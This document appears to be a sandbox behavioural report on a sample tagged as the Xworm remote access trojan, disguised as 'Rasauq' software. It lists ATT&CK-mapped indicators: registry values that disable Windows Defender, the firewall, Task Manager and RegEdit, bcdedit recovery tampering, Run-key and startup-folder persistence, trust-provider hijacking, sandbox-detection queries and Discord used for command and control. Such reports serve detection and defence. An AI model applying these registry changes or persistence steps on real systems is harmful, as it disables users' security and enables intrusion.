gurcu | 9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
6124	bcdedit.exe
2996	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5540	powershell.exe
1516	powershell.exe
4408	powershell.exe
4688	powershell.exe
1948	powershell.exe
4456	powershell.exe
4916	powershell.exe
5892	powershell.exe
396	powershell.exe
4868	powershell.exe
3328	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Manipulates Digital Signatures 1 TTPs 5 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5720	netsh.exe

Possible privilege escalation attempt 16 IoCs

exploit

pid	Process
3988	icacls.exe
852	takeown.exe
2604	icacls.exe
6008	takeown.exe
3800	takeown.exe
4012	takeown.exe
604	icacls.exe
3096	takeown.exe
3320	icacls.exe
5148	icacls.exe
4280	takeown.exe
5340	takeown.exe
2764	icacls.exe
5812	icacls.exe
1516	takeown.exe
232	takeown.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
3024	attrib.exe
5424	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	Rasauq Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	Rasauq SoftWorks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	sRasauq SoftWorks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	$77RealtekAudioDriverHost.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
2716	Rasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
5500	$77RealtekAudioDriverHost.exe

Modifies file permissions 1 TTPs 16 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5148	icacls.exe
5340	takeown.exe
3800	takeown.exe
3988	icacls.exe
4012	takeown.exe
1516	takeown.exe
3320	icacls.exe
4280	takeown.exe
5812	icacls.exe
852	takeown.exe
604	icacls.exe
6008	takeown.exe
232	takeown.exe
2604	icacls.exe
3096	takeown.exe
2764	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr"	Rasauq SoftWorks.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\""	sRasauq SoftWorks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
37	discord.com
38	discord.com

Power Settings 1 TTPs 6 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4416	powercfg.exe
3504	powercfg.exe
1132	powercfg.exe
3584	powercfg.exe
4844	powercfg.exe
316	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File created	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2892	sc.exe
4760	sc.exe
4604	sc.exe
3552	sc.exe
864	sc.exe
2368	sc.exe
4404	sc.exe
3696	sc.exe
3648	sc.exe
1724	sc.exe
4540	sc.exe
924	sc.exe
4684	sc.exe
280	sc.exe
4700	sc.exe
3016	sc.exe
6088	sc.exe
2756	sc.exe
4468	sc.exe
5084	sc.exe
3080	sc.exe
3808	sc.exe
5468	sc.exe
3968	sc.exe
3636	sc.exe
4392	sc.exe
4420	sc.exe
272	sc.exe
5936	sc.exe
3524	sc.exe
3532	sc.exe
4484	sc.exe
4412	sc.exe
4920	sc.exe
5092	sc.exe
288	sc.exe
3300	sc.exe
5704	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	powercfg.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
1624	timeout.exe
4880	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 18 IoCs

pid	Process
1828	taskkill.exe
4120	taskkill.exe
5932	taskkill.exe
5536	taskkill.exe
5648	taskkill.exe
6028	taskkill.exe
4460	taskkill.exe
3788	taskkill.exe
4992	taskkill.exe
3464	taskkill.exe
3304	taskkill.exe
6000	taskkill.exe
4916	taskkill.exe
1224	taskkill.exe
4028	taskkill.exe
5036	taskkill.exe
2104	taskkill.exe
2804	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software	reg.exe
